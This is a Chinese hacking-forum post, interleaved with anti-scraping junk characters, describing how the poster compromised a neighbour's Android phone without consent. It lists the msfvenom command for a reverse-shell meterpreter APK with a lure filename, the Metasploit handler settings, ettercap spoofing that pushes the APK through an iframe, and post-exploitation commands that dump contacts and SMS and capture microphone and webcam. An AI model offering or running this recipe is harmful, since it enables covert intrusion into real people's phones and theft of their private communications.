找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1610|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

6 u" V- _5 p2 F8 N( r 五、msf+ettercap入侵邻居安卓手机 ( ]% k: r" _* V) ~4 K: {9 _3 i

$ |: @' W8 @8 h6 X# L. v% n

/ d( a r m) ~5 p% {6 J% M4 { 首先启动msf 9 k# t- O( t+ ?& b

2 a7 g. K( d& i/ o

, v1 D$ r( b" C( Q5 U9 Z 先用kali生成一个安卓木马,如下命令: ; U% J% L1 T4 h p S: \5 t

0 d! d: N: n i/ Q9 A$ }# B

7 [! l H+ l5 C* J Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk ) J! l1 `4 Y: W* f8 J1 T

( m1 k) X0 G# R% x" t. }4 ^

9 _2 K; `1 N8 n 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 6 u' i" R* K) }' M3 J7 k- x

- }# d. E. O& H% C8 {

; p+ r. D, x( v- g9 o0 j1 L 然后进入msf 2 b$ x% |/ b" q$ }" @4 K& ~

' N3 _9 Q! L9 A2 p. h( N4 D5 ]+ r

! X" W! Q+ Q( T use exploit/multi/handler , H' @% B, ?3 ^1 P

1 V- B9 T. c2 o4 Z$ v7 e7 n& x

0 U7 c. h6 u, ]* T! Q1 P O set payload android/meterpreter/reverse_tcp " |) y) c R. s- w

! y8 Y0 l$ r9 y+ ~* n* a

: G( _8 B" d' {" p3 @' H set LHOST 192.168.0.109 //ipkailiip " i5 o* E. V2 j% X( [

. L& Y9 q% F- ~- \5 q( H* N: R

. Q) r- N4 F) ~9 ]; C2 m set LPORT 44444 //端口一定要与前面生成的木马的端口一致 & c- Z. E4 i7 i& a2 n; ~

; O: t0 x" q0 g& O+ e3 q7 n( d5 J

r5 \* L# l9 a/ I( f, S ~ Exploit 1 i$ j' o. t, o7 d5 q

! c5 _9 r4 h: B4 ?

3 V5 r8 c7 z; B; Y% y! f   + ]% |' {4 r, ?

2 v! d9 {5 h" Y w' }* R$ @

. ]4 X% x+ @% u! }/ D8 n* w 下面我们开启ettercap -G . F2 {' \% N4 m/ ]4 E

3 A5 C6 y& U. @( ?

3 X& U ~; G$ n/ [5 N 我物理IP # K8 H5 z! A9 ~

- k. p2 i: m" R; d; N

* C7 l; y0 D0 K8 ^ n! K   ' T& W5 s A5 n+ P) h6 Q2 {6 L

2 w. f7 S/ Q B/ L. n$ o9 l. h, ^

n1 N: r6 M0 ^! \! e( f: }# k 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, . e; V! b4 B# ?8 K5 l

) I8 L' W: V& K; U

$ o/ u/ l2 x# G 下面我们来设置一下 9 @2 n6 w+ X: V( E) Z5 P4 k

% V+ C( c7 z3 j

) X* J# J0 c; N   8 x$ g, h& G4 a' N: g9 K! Z0 Z8 }

# q# `) ~- g" {( Z1 U$ |! J

& f5 z; Q: m6 m' W7 C 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, , H( E( o$ M3 ?8 j( o

% a" g: e& J, b

, a9 d; T% C- J4 @! d   8 K4 s, n2 K- K4 g3 A' |' G, X

6 [7 `# Z% s; a% p

6 R! }8 P, y: C* O* d) \9 c$ X   ' @* f; @1 N" y4 |

. c. W4 p6 x1 ^- ~4 a; z$ q: h

: V) B% ]. T) C( S* d" o) G   & G6 ~! z% o6 L5 s' x" R

% C* Q: v2 {) s; ]. O

6 L% e# x; ^& Y0 R, J   4 A7 @& F2 ^, L& I% h$ I% d

, Q5 m$ H) A$ I$ H

+ B, `3 W5 |& D3 _) s& h. D9 h   2 H) C+ M* @3 ]2 w9 f

' ^4 {2 Q- i: Q& ~- s+ N8 ^

' [% J( A9 n0 a7 ~5 ?   ( C+ A7 w& s; O' |: h

: u9 L* @5 K: U$ R& v% l9 Z" q( w

2 q+ Q! p/ f5 V   # P7 z7 G: V' E+ r

6 y) m' R" Q8 V/ {" j8 S- H

! ?, [% O \5 ^   , Y' O9 j- e5 Z. W: n$ u c

6 Z$ f6 f, ~$ U. B* b

8 c5 W5 f, f+ Q b" [- J( t# H   ' ~1 `+ I; h5 z6 I% ?+ [$ Q

& \! F: J4 u, E/ t" W0 }7 Z

m/ A, |# G; D   % j& @5 t- g: ?- A! W9 l* r

& @2 Y+ x$ m4 s0 T. ]# L

8 o# U; Y- A8 x7 c# b   0 {# z; u' O1 Z1 _' t

- t( s- E6 g) O& K

* Y# }& p8 ~5 C4 G   3 V7 O* z! d' V* i$ i [6 C% Q4 l* m

% B% a& {6 r$ }& p7 Y+ D7 O2 \

9 H6 w# o' y8 a: P, r' x   1 D' E6 ?+ F7 t" Q0 R" k, v: H

9 s. \8 g8 w: u5 n0 e8 J

! W9 O4 r0 S7 m8 P" k 下面我们开始攻击 & B1 g" W4 v6 @# ^9 ]

( V# F% Y A* }* Q) r* W, t

1 w/ Y7 }5 j. J9 x3 G   % Z( y$ u6 P3 X

! t! f9 `9 _3 ~/ s( M) ^* b

9 H) l ?% `$ H7 t s   9 n a H: S- V

9 y3 l; k1 {$ {5 Z9 |" h

A7 R+ f5 ^) d3 U6 M: ~/ l5 R   - `. U; l8 a. m. y6 ^, c+ x( {

+ r5 ?5 a( M; i* n) Y

0 P5 c+ b5 U2 Z) d: n' Y   + Z9 `: X- x+ {& _0 O3 z

P3 q, R* n Z* s

" R$ a. w- h2 R8 M5 G$ w5 p   7 I- f: b* g1 M9 z" v% L; k

8 I0 @% I* G8 q7 K! z

& |/ w( \$ e* Q$ m# @# X 大概过了5分钟多,发现反弹成功了 ; K& Z- @8 L3 h+ J% u ?& W

4 G+ V+ T9 ~9 I/ o6 N8 i: _4 g0 w

( P6 Q: r6 E( ]% i   6 O1 n! K2 h( z

+ q: i% {0 |6 s; N/ f$ m6 w

, Z9 W+ Q+ u$ c8 B   0 @3 z: x3 @$ B, m

1 o: ~/ X4 A8 }/ L6 a3 ?7 g) R

6 K: X/ p) \1 Z. v3 p+ c   ' |& N' O! k! c+ K& @; E

% n3 o4 E) N8 R! d

# J$ {' d, ~5 W$ x9 B- W" N+ p   $ g' Z& `$ L! Y# M. e2 P& A

8 P& Y1 F% Y8 _0 M

0 R& H2 r/ x" y! m, K+ G+ K   6 M5 U. \/ r; _

8 I2 X2 g' [& { ~9 n s

9 A$ S* \8 i- N5 I. Q+ Z" M3 r- N   5 |7 X8 P6 n: U! i& ?: q

, o$ u- B4 Z% ?

) ?/ N) h% }' d& F0 {1 G) i   2 ~% o; G2 O: i* w. i$ }

% [( p1 M/ M1 K* C0 S7 G; H

, K! `9 Y5 M' _2 A/ D4 m 执行命令 % n3 s I, l1 I2 j$ U7 A/ x

, w1 n; f: O& p# B3 ~

$ m8 n6 x8 [$ V% O: c; D8 B n   9 N6 ?6 h0 n% }/ h2 ]

% R4 o) @& s$ `8 m& j

7 G" t# S! A4 c' \- a7 y" a dump_contacts    --》这个是导出电话 `* Y' @/ z6 R, e8 }. W/ x4 A

! Q9 E% X1 [! x3 a& m% I1 l* z

$ M* ~. C; l: h z! _# W8 l dump_sms --》这个是导出信息 1 i7 I# W- m9 @5 H4 Q

/ K, C6 [% J0 z1 x ^$ m7 F

. f$ i; H: ^% I0 C' ? record_mic     Record audio from the default microphone for X seconds - ? Q4 i' M1 X1 m; X

8 o& y, _9 ^ i: I* P7 S

4 E# m, G' j, I     webcam_chat    Start a video chat 0 _' S3 D1 B$ E/ `% L: d. G

; U; h( k* X3 O: h

6 E/ r- v% |. S5 f: a     webcam_list    List webcams : c; y0 G# q6 W# X1 g) U3 G

; G6 w% k; |- M5 C) u# I

0 g. s: U/ o* K( ]     webcam_snap    Take a snapshot from the specified webcam 4 o1 Q7 D$ q- E3 r3 F \

8 o; ^, o$ u) k

' {* M+ a3 X; g webcam_stream  lay a video stream from the specified webcam ' C$ X7 k+ k6 ]8 `! I

( O7 l6 | ~1 S* T, C# w1 P3 [

& R/ o4 X& l' J- p# @9 u   2 E4 R$ ^8 Y& p9 a4 Z3 d

* L. w1 N C$ A

! I5 S% m/ W5 f0 G* u3 f5 Z1 D   . p( }, h, G3 c1 l

, |4 T; H- f6 ~5 D) z) |- M

0 O6 h% ]4 ~5 Y 我们打开看一下电话薄, $ B- K1 e7 h( p% U5 J" n" o

8 V* m0 m# H8 U2 p! S4 j

6 X% Y3 c6 a; l" K W" W- c   ! k/ _+ c$ W7 w6 x: |

# P. P9 N" l, l$ {; q. z

$ r. j4 I s- \9 a1 N4 @   6 y; \/ e& X4 D" w* y

# W$ V2 P' @3 M

: t3 {+ ~8 w% \& V5 o2 y0 f" J   5 Y5 y; g# U3 _2 Z z

1 s, i$ H% o0 n6 t# k

- j' X9 y" ~1 V3 j# d& V7 R   ( Q7 b* z0 s' A2 l9 [: Q7 _# i

3 T! A' V. @1 J* _$ K# W0 j% o

. C: w, k$ V S# H   9 \# M H5 V2 Q( K+ N2 K

9 E7 j; I9 m8 r: _3 P

# ]8 j5 J+ @. m/ P! i   $ f! G: w4 k m( K, L( o

8 x0 W9 A) z8 i0 s5 O- f. ~7 w

, Q: x; x' @/ B, X5 X7 X) w 我们同时欺骗成DroidJack木马,使用方法如图: + _4 ^0 d, S1 p3 t

3 i+ p# \6 }, C# D4 I8 H

! g0 q+ f" {+ j, Z+ T   4 x) o* W7 ^# M/ O) B

) O3 @+ a/ e4 J6 }9 n2 W% x

: \1 i) l6 g+ [4 E! y) w2 A' z5 l6 ^2 V   & V$ d5 R4 G3 G# r

& C3 F+ f" J8 F3 H- `, U0 m0 H

# G+ D3 R2 Z8 _0 ]1 C   . N Q! ]/ z; y! v

6 u3 @# s, g) F4 R; m

8 T6 L Q( ~. S: a 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 + d! T5 W9 y: w9 z9 ^2 _! T

* J$ e! i9 @5 Q9 n. B- k

: g& _- y" }# u# \* Q   ) f! i& ^1 v: A

; R. H' M* f8 G( M1 x2 Q# x1 h5 a

3 K7 e* v% Z: J( Y$ y0 b1 w   ) x3 q# @. F# x: B7 H4 ~9 d& l

3 M$ E& d4 Q! e; Q% ~

& @! q& C$ i, ^5 K _7 H   7 [0 g' n4 s$ [, g; o% O

& u7 z. S b! X5 @8 e: ~$ x1 q; i

A0 n, [* M' n( M% U0 W r % c% e7 Z6 F/ o$ n2 ^ Z* b: Z

4 K+ K1 m+ H% s

9 M! a7 F p$ @7 _
+ H0 Y5 m$ p- K4 }8 J7 P

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表